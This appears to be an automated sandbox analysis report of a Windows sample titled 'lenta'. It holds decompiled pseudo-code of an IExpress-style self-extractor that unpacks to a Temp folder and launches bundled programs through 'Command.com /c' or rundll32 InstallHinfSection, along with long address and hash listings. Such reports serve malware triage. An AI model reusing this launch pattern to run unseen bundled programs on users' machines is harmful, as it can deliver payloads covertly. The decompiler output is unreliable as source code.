                                                                        0x003d3ec5
                                                                        0x003d3ec5
                                                                        0x003d3eca
                                                                        0x003d3eca
                                                                        0x003d3ece
                                                                        0x003d3ed5
                                                                        0x003d3ed9
                                                                        0x003d3ee0
                                                                        0x003d3ee6
                                                                        0x003d3eea
                                                                        0x003d3eec
                                                                        0x003d3eee
                                                                        0x003d3ef3
                                                                        0x003d3ef3
                                                                        0x003d3ef5
                                                                        0x003d3efa
                                                                        0x003d3efb
                                                                        0x003d3efd
                                                                        0x003d3f40
                                                                        0x00000000
                                                                        0x003d3eff
                                                                        0x003d3eff
                                                                        0x003d3f05
                                                                        0x00000000
                                                                        0x003d3f05
                                                                        0x003d3efd
                                                                        0x003d3dc7
                                                                        0x003d3dce
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3dd0
                                                                        0x003d3dd7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3dd9
                                                                        0x003d3ddb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3ddd
                                                                        0x003d3de1
                                                                        0x00000000
                                                                        0x003d3de1
                                                                        0x003d3d59
                                                                        0x003d3d65
                                                                        0x003d3d6a
                                                                        0x003d3d6c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3d6e
                                                                        0x003d3d75
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3d8f
                                                                        0x003d3d96
                                                                        0x003d3d98
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3d98
                                                                        0x003d3c8f
                                                                        0x003d3c98
                                                                        0x003d3cf1
                                                                        0x003d3cf3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3cfe
                                                                        0x003d3d11
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3d11
                                                                        0x003d3c9c
                                                                        0x003d3ca5
                                                                        0x003d3ca7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3cad
                                                                        0x003d3cb2
                                                                        0x003d3cb7
                                                                        0x003d3cc5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3ce8
                                                                        0x003d3cec
                                                                        0x003d3ced
                                                                        0x003d3ced
                                                                        0x00000000
                                                                        0x003d3ce8
                                                                        0x003d3c9e
                                                                        0x00000000
                                                                        0x003d3c9e
                                                                        0x003d3c56
                                                                        0x003d3d35
                                                                        0x003d3d35
                                                                        0x003d3d3c
                                                                        0x003d3d48
                                                                        0x00000000
                                                                        0x003d3d48
                                                                        0x003d3c03
                                                                        0x003d3be2
                                                                        0x003d3be7
                                                                        0x003d3bee
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • memset.MSVCRT ref: 003D3C11
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 003D3CDC
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46A0
                                                                          • Part of subcall function 003D468F: SizeofResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46A9
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46C3
                                                                          • Part of subcall function 003D468F: LoadResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46CC
                                                                          • Part of subcall function 003D468F: LockResource.KERNEL32(00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46D3
                                                                          • Part of subcall function 003D468F: memcpy_s.MSVCRT ref: 003D46E5
                                                                          • Part of subcall function 003D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46EF
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,003D8C42), ref: 003D3D8F
                                                                        • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 003D3E26
                                                                        • FreeLibrary.KERNEL32(00000000,?,003D8C42), ref: 003D3EFF
                                                                        • LocalFree.KERNEL32(?,?,?,?,003D8C42), ref: 003D3F1F
                                                                        • FreeLibrary.KERNEL32(00000000,?,003D8C42), ref: 003D3F40
                                                                        • LocalFree.KERNEL32(?,?,?,?,003D8C42), ref: 003D3F47
                                                                        • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,003D8C42), ref: 003D3F76
                                                                        • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,003D8C42), ref: 003D3F80
                                                                        • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,003D8C42), ref: 003D3FC2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                        • String ID: <None>$ADMQCMD$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                        • API String ID: 1032054927-4257430877
                                                                        • Opcode ID: 9f65d121e77cd66cc92b4be705746909b8f6a501a8fb187f3745434587499bda
                                                                        • Instruction ID: de9338c067b25272c7266e359b193f05b8d4d1388e04db7886c3a4ad30223516
                                                                        • Opcode Fuzzy Hash: 9f65d121e77cd66cc92b4be705746909b8f6a501a8fb187f3745434587499bda
                                                                        • Instruction Fuzzy Hash: 2DB1CD72A093019BD7239F24B845B6B77E9AB84700F11092BFA95DB390DB708E44CB93
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 141 3d1ae8-3d1b2c call 3d1680 144 3d1b2e-3d1b39 141->144 145 3d1b3b-3d1b40 141->145 146 3d1b46-3d1b61 call 3d1a84 144->146 145->146 149 3d1b9f-3d1bc2 call 3d1781 call 3d658a 146->149 150 3d1b63-3d1b65 146->150 159 3d1bc7-3d1bd3 call 3d66c8 149->159 152 3d1b68-3d1b6d 150->152 152->152 154 3d1b6f-3d1b74 152->154 154->149 156 3d1b76-3d1b7b 154->156 157 3d1b7d-3d1b81 156->157 158 3d1b83-3d1b86 156->158 157->158 160 3d1b8c-3d1b9d call 3d1680 157->160 158->149 161 3d1b88-3d1b8a 158->161 166 3d1bd9-3d1bf1 CompareStringA 159->166 167 3d1d73-3d1d7f call 3d66c8 159->167 160->159 161->149 161->160 166->167 168 3d1bf7-3d1c07 GetFileAttributesA 166->168 174 3d1df8-3d1e09 LocalAlloc 167->174 175 3d1d81-3d1d99 CompareStringA 167->175 171 3d1c0d-3d1c15 168->171 172 3d1d53-3d1d5e 168->172 171->172 173 3d1c1b-3d1c33 call 3d1a84 171->173 176 3d1d64-3d1d6e call 3d44b9 172->176 187 3d1c35-3d1c38 173->187 188 3d1c50-3d1c61 LocalAlloc 173->188 179 3d1e0b-3d1e1b GetFileAttributesA 174->179 180 3d1dd4-3d1ddf 174->180 175->174 178 3d1d9b-3d1da2 175->178 192 3d1e94-3d1ea4 call 3d6ce0 176->192 183 3d1da5-3d1daa 178->183 184 3d1e1d-3d1e1f 179->184 185 3d1e67-3d1e73 call 3d1680 179->185 180->176 183->183 189 3d1dac-3d1db4 183->189 184->185 191 3d1e21-3d1e3e call 3d1781 184->191 197 3d1e78-3d1e84 call 3d2aac 185->197 193 3d1c3a 187->193 194 3d1c40-3d1c4b call 3d1a84 187->194 188->180 196 3d1c67-3d1c72 188->196 195 3d1db7-3d1dbc 189->195 191->197 207 3d1e40-3d1e43 191->207 193->194 194->188 195->195 202 3d1dbe-3d1dd2 LocalAlloc 195->202 203 3d1c79-3d1cc0 GetPrivateProfileIntA GetPrivateProfileStringA 196->203 204 3d1c74 196->204 211 3d1e89-3d1e92 197->211 202->180 208 3d1de1-3d1df3 call 3d171e 202->208 209 3d1cf8-3d1d07 203->209 210 3d1cc2-3d1ccc 203->210 204->203 207->197 212 3d1e45-3d1e65 call 3d16b3 * 2 207->212 208->211 213 3d1d09-3d1d21 GetShortPathNameA 209->213 214 3d1d23 209->214 216 3d1cce 210->216 217 3d1cd3-3d1cf3 call 3d1680 * 2 210->217 211->192 212->197 219 3d1d28-3d1d2b 213->219 214->219 216->217 217->211 223 3d1d2d 219->223 224 3d1d32-3d1d4e call 3d171e 219->224 223->224 224->211
                                                                        C-Code - Quality: 82%
                                                                        			E003D1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v527;
                                                                        				char _v528;
                                                                        				char _v1552;
                                                                        				CHAR* _v1556;
                                                                        				int* _v1560;
                                                                        				CHAR** _v1564;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t48;
                                                                        				CHAR* _t53;
                                                                        				CHAR* _t54;
                                                                        				char* _t57;
                                                                        				char* _t58;
                                                                        				CHAR* _t60;
                                                                        				void* _t62;
                                                                        				signed char _t65;
                                                                        				intOrPtr _t76;
                                                                        				intOrPtr _t77;
                                                                        				unsigned int _t85;
                                                                        				CHAR* _t90;
                                                                        				CHAR* _t92;
                                                                        				char _t105;
                                                                        				char _t106;
                                                                        				CHAR** _t111;
                                                                        				CHAR* _t115;
                                                                        				intOrPtr* _t125;
                                                                        				void* _t126;
                                                                        				CHAR* _t132;
                                                                        				CHAR* _t135;
                                                                        				void* _t138;
                                                                        				void* _t139;
                                                                        				void* _t145;
                                                                        				intOrPtr* _t146;
                                                                        				char* _t148;
                                                                        				CHAR* _t151;
                                                                        				void* _t152;
                                                                        				CHAR* _t155;
                                                                        				CHAR* _t156;
                                                                        				void* _t157;
                                                                        				signed int _t158;
                                                                        
                                                                        				_t48 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t48 ^ _t158;
                                                                        				_t108 = __ecx;
                                                                        				_v1564 = _a4;
                                                                        				_v1560 = _a8;
                                                                        				E003D1680( &_v528, 0x104, __ecx);
                                                                        				if(_v528 != 0x22) {
                                                                        					_t135 = " ";
                                                                        					_t53 =  &_v528;
                                                                        				} else {
                                                                        					_t135 = "\"";
                                                                        					_t53 =  &_v527;
                                                                        				}
                                                                        				_t111 =  &_v1556;
                                                                        				_v1556 = _t53;
                                                                        				_t54 = E003D1A84(_t111, _t135);
                                                                        				_t156 = _v1556;
                                                                        				_t151 = _t54;
                                                                        				if(_t156 == 0) {
                                                                        					L12:
                                                                        					_push(_t111);
                                                                        					E003D1781( &_v268, 0x104, _t111, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\");
                                                                        					E003D658A( &_v268, 0x104, _t156);
                                                                        					goto L13;
                                                                        				} else {
                                                                        					_t132 = _t156;
                                                                        					_t148 =  &(_t132[1]);
                                                                        					do {
                                                                        						_t105 =  *_t132;
                                                                        						_t132 =  &(_t132[1]);
                                                                        					} while (_t105 != 0);
                                                                        					_t111 = _t132 - _t148;
                                                                        					if(_t111 < 3) {
                                                                        						goto L12;
                                                                        					}
                                                                        					_t106 = _t156[1];
                                                                        					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                        						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                        							goto L12;
                                                                        						} else {
                                                                        							goto L11;
                                                                        						}
                                                                        					} else {
                                                                        						L11:
                                                                        						E003D1680( &_v268, 0x104, _t156);
                                                                        						L13:
                                                                        						_t138 = 0x2e;
                                                                        						_t57 = E003D66C8(_t156, _t138);
                                                                        						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                        							_t139 = 0x2e;
                                                                        							_t115 = _t156;
                                                                        							_t58 = E003D66C8(_t115, _t139);
                                                                        							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                        								_t156 = LocalAlloc(0x40, 0x400);
                                                                        								if(_t156 == 0) {
                                                                        									goto L43;
                                                                        								}
                                                                        								_t65 = GetFileAttributesA( &_v268); // executed
                                                                        								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                        									E003D1680( &_v1552, 0x400, _t108);
                                                                        								} else {
                                                                        									_push(_t115);
                                                                        									_t108 = 0x400;
                                                                        									E003D1781( &_v1552, 0x400, _t115,  &_v268);
                                                                        									if(_t151 != 0 &&  *_t151 != 0) {
                                                                        										E003D16B3( &_v1552, 0x400, " ");
                                                                        										E003D16B3( &_v1552, 0x400, _t151);
                                                                        									}
                                                                        								}
                                                                        								_t140 = _t156;
                                                                        								 *_t156 = 0;
                                                                        								E003D2AAC( &_v1552, _t156, _t156);
                                                                        								goto L53;
                                                                        							} else {
                                                                        								_t108 = "Command.com /c %s";
                                                                        								_t125 = "Command.com /c %s";
                                                                        								_t145 = _t125 + 1;
                                                                        								do {
                                                                        									_t76 =  *_t125;
                                                                        									_t125 = _t125 + 1;
                                                                        								} while (_t76 != 0);
                                                                        								_t126 = _t125 - _t145;
                                                                        								_t146 =  &_v268;
                                                                        								_t157 = _t146 + 1;
                                                                        								do {
                                                                        									_t77 =  *_t146;
                                                                        									_t146 = _t146 + 1;
                                                                        								} while (_t77 != 0);
                                                                        								_t140 = _t146 - _t157;
                                                                        								_t154 = _t126 + 8 + _t146 - _t157;
                                                                        								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                        								if(_t156 != 0) {
                                                                        									E003D171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                        									goto L53;
                                                                        								}
                                                                        								goto L43;
                                                                        							}
                                                                        						} else {
                                                                        							_t85 = GetFileAttributesA( &_v268);
                                                                        							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                        								_t140 = 0x525;
                                                                        								_push(0);
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_t60 =  &_v268;
                                                                        								goto L35;
                                                                        							} else {
                                                                        								_t140 = "[";
                                                                        								_v1556 = _t151;
                                                                        								_t90 = E003D1A84( &_v1556, "[");
                                                                        								if(_t90 != 0) {
                                                                        									if( *_t90 != 0) {
                                                                        										_v1556 = _t90;
                                                                        									}
                                                                        									_t140 = "]";
                                                                        									E003D1A84( &_v1556, "]");
                                                                        								}
                                                                        								_t156 = LocalAlloc(0x40, 0x200);
                                                                        								if(_t156 == 0) {
                                                                        									L43:
                                                                        									_t60 = 0;
                                                                        									_t140 = 0x4b5;
                                                                        									_push(0);
                                                                        									_push(0x10);
                                                                        									_push(0);
                                                                        									L35:
                                                                        									_push(_t60);
                                                                        									E003D44B9(0, _t140);
                                                                        									_t62 = 0;
                                                                        									goto L54;
                                                                        								} else {
                                                                        									_t155 = _v1556;
                                                                        									_t92 = _t155;
                                                                        									if( *_t155 == 0) {
                                                                        										_t92 = "DefaultInstall";
                                                                        									}
                                                                        									 *0x3d9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                        									 *_v1560 = 1;
                                                                        									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x3d1140, _t156, 8,  &_v268) == 0) {
                                                                        										 *0x3d9a34 =  *0x3d9a34 & 0xfffffffb;
                                                                        										if( *0x3d9a40 != 0) {
                                                                        											_t108 = "setupapi.dll";
                                                                        										} else {
                                                                        											_t108 = "setupx.dll";
                                                                        											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                        										}
                                                                        										if( *_t155 == 0) {
                                                                        											_t155 = "DefaultInstall";
                                                                        										}
                                                                        										_push( &_v268);
                                                                        										_push(_t155);
                                                                        										E003D171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                        									} else {
                                                                        										 *0x3d9a34 =  *0x3d9a34 | 0x00000004;
                                                                        										if( *_t155 == 0) {
                                                                        											_t155 = "DefaultInstall";
                                                                        										}
                                                                        										E003D1680(_t108, 0x104, _t155);
                                                                        										_t140 = 0x200;
                                                                        										E003D1680(_t156, 0x200,  &_v268);
                                                                        									}
                                                                        									L53:
                                                                        									_t62 = 1;
                                                                        									 *_v1564 = _t156;
                                                                        									L54:
                                                                        									_pop(_t152);
                                                                        									return E003D6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}














































                                                                        0x003d1af3
                                                                        0x003d1afa
                                                                        0x003d1b07
                                                                        0x003d1b09
                                                                        0x003d1b1a
                                                                        0x003d1b20
                                                                        0x003d1b2c
                                                                        0x003d1b3b
                                                                        0x003d1b40
                                                                        0x003d1b2e
                                                                        0x003d1b2e
                                                                        0x003d1b33
                                                                        0x003d1b33
                                                                        0x003d1b46
                                                                        0x003d1b4c
                                                                        0x003d1b52
                                                                        0x003d1b57
                                                                        0x003d1b5d
                                                                        0x003d1b61
                                                                        0x003d1b9f
                                                                        0x003d1b9f
                                                                        0x003d1bb1
                                                                        0x003d1bc2
                                                                        0x00000000
                                                                        0x003d1b63
                                                                        0x003d1b63
                                                                        0x003d1b65
                                                                        0x003d1b68
                                                                        0x003d1b68
                                                                        0x003d1b6a
                                                                        0x003d1b6b
                                                                        0x003d1b6f
                                                                        0x003d1b74
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d1b76
                                                                        0x003d1b7b
                                                                        0x003d1b86
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d1b8c
                                                                        0x003d1b8c
                                                                        0x003d1b98
                                                                        0x003d1bc7
                                                                        0x003d1bc9
                                                                        0x003d1bcc
                                                                        0x003d1bd3
                                                                        0x003d1d75
                                                                        0x003d1d76
                                                                        0x003d1d78
                                                                        0x003d1d7f
                                                                        0x003d1e05
                                                                        0x003d1e09
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d1e12
                                                                        0x003d1e1b
                                                                        0x003d1e73
                                                                        0x003d1e21
                                                                        0x003d1e21
                                                                        0x003d1e28
                                                                        0x003d1e37
                                                                        0x003d1e3e
                                                                        0x003d1e52
                                                                        0x003d1e60
                                                                        0x003d1e60
                                                                        0x003d1e3e
                                                                        0x003d1e79
                                                                        0x003d1e7b
                                                                        0x003d1e84
                                                                        0x00000000
                                                                        0x003d1d9b
                                                                        0x003d1d9b
                                                                        0x003d1da0
                                                                        0x003d1da2
                                                                        0x003d1da5
                                                                        0x003d1da5
                                                                        0x003d1da7
                                                                        0x003d1da8
                                                                        0x003d1dac
                                                                        0x003d1dae
                                                                        0x003d1db4
                                                                        0x003d1db7
                                                                        0x003d1db7
                                                                        0x003d1db9
                                                                        0x003d1dba
                                                                        0x003d1dbe
                                                                        0x003d1dc3
                                                                        0x003d1dce
                                                                        0x003d1dd2
                                                                        0x003d1deb
                                                                        0x00000000
                                                                        0x003d1df0
                                                                        0x00000000
                                                                        0x003d1dd2
                                                                        0x003d1bf7
                                                                        0x003d1bfe
                                                                        0x003d1c07
                                                                        0x003d1d55
                                                                        0x003d1d5a
                                                                        0x003d1d5b
                                                                        0x003d1d5d
                                                                        0x003d1d5e
                                                                        0x00000000
                                                                        0x003d1c1b
                                                                        0x003d1c1b
                                                                        0x003d1c20
                                                                        0x003d1c2c
                                                                        0x003d1c33
                                                                        0x003d1c38
                                                                        0x003d1c3a
                                                                        0x003d1c3a
                                                                        0x003d1c40
                                                                        0x003d1c4b
                                                                        0x003d1c4b
                                                                        0x003d1c5d
                                                                        0x003d1c61
                                                                        0x003d1dd4
                                                                        0x003d1dd4
                                                                        0x003d1dd6
                                                                        0x003d1ddb
                                                                        0x003d1ddc
                                                                        0x003d1dde
                                                                        0x003d1d64
                                                                        0x003d1d64
                                                                        0x003d1d67
                                                                        0x003d1d6c
                                                                        0x00000000
                                                                        0x003d1c67
                                                                        0x003d1c67
                                                                        0x003d1c6d
                                                                        0x003d1c72
                                                                        0x003d1c74
                                                                        0x003d1c74
                                                                        0x003d1c8e
                                                                        0x003d1c99
                                                                        0x003d1cc0
                                                                        0x003d1cf8
                                                                        0x003d1d07
                                                                        0x003d1d23
                                                                        0x003d1d09
                                                                        0x003d1d14
                                                                        0x003d1d1b
                                                                        0x003d1d1b
                                                                        0x003d1d2b
                                                                        0x003d1d2d
                                                                        0x003d1d2d
                                                                        0x003d1d38
                                                                        0x003d1d39
                                                                        0x003d1d46
                                                                        0x003d1cc2
                                                                        0x003d1cc2
                                                                        0x003d1ccc
                                                                        0x003d1cce
                                                                        0x003d1cce
                                                                        0x003d1cdb
                                                                        0x003d1ce6
                                                                        0x003d1cee
                                                                        0x003d1cee
                                                                        0x003d1e89
                                                                        0x003d1e91
                                                                        0x003d1e92
                                                                        0x003d1e94
                                                                        0x003d1e97
                                                                        0x003d1ea4
                                                                        0x003d1ea4
                                                                        0x003d1c61
                                                                        0x003d1c07
                                                                        0x003d1bd3
                                                                        0x003d1b7b

                                                                        APIs
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 003D1BE7
                                                                        • GetFileAttributesA.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 003D1BFE
                                                                        • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 003D1C57
                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 003D1C88
                                                                        • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,003D1140,00000000,00000008,?), ref: 003D1CB8
                                                                        • GetShortPathNameA.KERNEL32 ref: 003D1D1B
                                                                          • Part of subcall function 003D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003D4518
                                                                          • Part of subcall function 003D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 003D4554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                        • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                        • API String ID: 383838535-1533028066
                                                                        • Opcode ID: 53e8b945a02e5bec41123b95bdb0973a9886abd8a0924b8e555a3088fc9c838c
                                                                        • Instruction ID: bb7dfbcd34bec9bad14868aac5535bce21f418266a9d2003e2ff41b411c9723e
                                                                        • Opcode Fuzzy Hash: 53e8b945a02e5bec41123b95bdb0973a9886abd8a0924b8e555a3088fc9c838c
                                                                        • Instruction Fuzzy Hash: 7EA166B3A002187BEB239B24FC45FFA776AAB45310F140297E955A73C1DBB09E85CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 324 3d597d-3d59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 3d59dd-3d5a1b GetDiskFreeSpaceA 324->325 326 3d59bb-3d59d8 call 3d44b9 call 3d6285 324->326 328 3d5ba1-3d5bde memset call 3d6285 GetLastError FormatMessageA 325->328 329 3d5a21-3d5a4a MulDiv 325->329 343 3d5c05-3d5c14 call 3d6ce0 326->343 338 3d5be3-3d5bfc call 3d44b9 SetCurrentDirectoryA 328->338 329->328 332 3d5a50-3d5a6c GetVolumeInformationA 329->332 335 3d5a6e-3d5ab0 memset call 3d6285 GetLastError FormatMessageA 332->335 336 3d5ab5-3d5aca SetCurrentDirectoryA 332->336 335->338 340 3d5acc-3d5ad1 336->340 353 3d5c02 338->353 341 3d5ad3-3d5ad8 340->341 342 3d5ae2-3d5ae4 340->342 341->342 346 3d5ada-3d5ae0 341->346 348 3d5ae7-3d5af8 342->348 349 3d5ae6 342->349 346->340 346->342 352 3d5af9-3d5afb 348->352 349->348 355 3d5afd-3d5b03 352->355 356 3d5b05-3d5b08 352->356 354 3d5c04 353->354 354->343 355->352 355->356 357 3d5b0a-3d5b1b call 3d44b9 356->357 358 3d5b20-3d5b27 356->358 357->353 360 3d5b29-3d5b33 358->360 361 3d5b52-3d5b5b 358->361 360->361 363 3d5b35-3d5b50 360->363 364 3d5b62-3d5b6d 361->364 363->364 365 3d5b6f-3d5b74 364->365 366 3d5b76-3d5b7d 364->366 367 3d5b85 365->367 368 3d5b7f-3d5b81 366->368 369 3d5b83 366->369 370 3d5b87-3d5b94 call 3d268b 367->370 371 3d5b96-3d5b9f 367->371 368->367 369->367 370->354 371->354
                                                                        C-Code - Quality: 96%
                                                                        			E003D597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                        				signed int _v8;
                                                                        				char _v16;
                                                                        				char _v276;
                                                                        				char _v788;
                                                                        				long _v792;
                                                                        				long _v796;
                                                                        				long _v800;
                                                                        				signed int _v804;
                                                                        				long _v808;
                                                                        				int _v812;
                                                                        				long _v816;
                                                                        				long _v820;
                                                                        				void* __ebx;
                                                                        				void* __esi;
                                                                        				signed int _t46;
                                                                        				int _t50;
                                                                        				signed int _t55;
                                                                        				void* _t66;
                                                                        				int _t69;
                                                                        				signed int _t73;
                                                                        				signed short _t78;
                                                                        				signed int _t87;
                                                                        				signed int _t101;
                                                                        				int _t102;
                                                                        				unsigned int _t103;
                                                                        				unsigned int _t105;
                                                                        				signed int _t111;
                                                                        				long _t112;
                                                                        				signed int _t116;
                                                                        				CHAR* _t118;
                                                                        				signed int _t119;
                                                                        				signed int _t120;
                                                                        
                                                                        				_t114 = __edi;
                                                                        				_t46 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t46 ^ _t120;
                                                                        				_v804 = __edx;
                                                                        				_t118 = __ecx;
                                                                        				GetCurrentDirectoryA(0x104,  &_v276);
                                                                        				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                        				if(_t50 != 0) {
                                                                        					_push(__edi);
                                                                        					_v796 = 0;
                                                                        					_v792 = 0;
                                                                        					_v800 = 0;
                                                                        					_v808 = 0;
                                                                        					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                        					__eflags = _t55;
                                                                        					if(_t55 == 0) {
                                                                        						L29:
                                                                        						memset( &_v788, 0, 0x200);
                                                                        						 *0x3d9124 = E003D6285();
                                                                        						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                        						_t110 = 0x4b0;
                                                                        						L30:
                                                                        						__eflags = 0;
                                                                        						E003D44B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                        						SetCurrentDirectoryA( &_v276);
                                                                        						L31:
                                                                        						_t66 = 0;
                                                                        						__eflags = 0;
                                                                        						L32:
                                                                        						_pop(_t114);
                                                                        						goto L33;
                                                                        					}
                                                                        					_t69 = _v792 * _v796;
                                                                        					_v812 = _t69;
                                                                        					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                        					__eflags = _t116;
                                                                        					if(_t116 == 0) {
                                                                        						goto L29;
                                                                        					}
                                                                        					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                        					__eflags = _t73;
                                                                        					if(_t73 != 0) {
                                                                        						SetCurrentDirectoryA( &_v276); // executed
                                                                        						_t101 =  &_v16;
                                                                        						_t111 = 6;
                                                                        						_t119 = _t118 - _t101;
                                                                        						__eflags = _t119;
                                                                        						while(1) {
                                                                        							_t22 = _t111 - 4; // 0x2
                                                                        							__eflags = _t22;
                                                                        							if(_t22 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                        							__eflags = _t87;
                                                                        							if(_t87 == 0) {
                                                                        								break;
                                                                        							}
                                                                        							 *_t101 = _t87;
                                                                        							_t101 = _t101 + 1;
                                                                        							_t111 = _t111 - 1;
                                                                        							__eflags = _t111;
                                                                        							if(_t111 != 0) {
                                                                        								continue;
                                                                        							}
                                                                        							break;
                                                                        						}
                                                                        						__eflags = _t111;
                                                                        						if(_t111 == 0) {
                                                                        							_t101 = _t101 - 1;
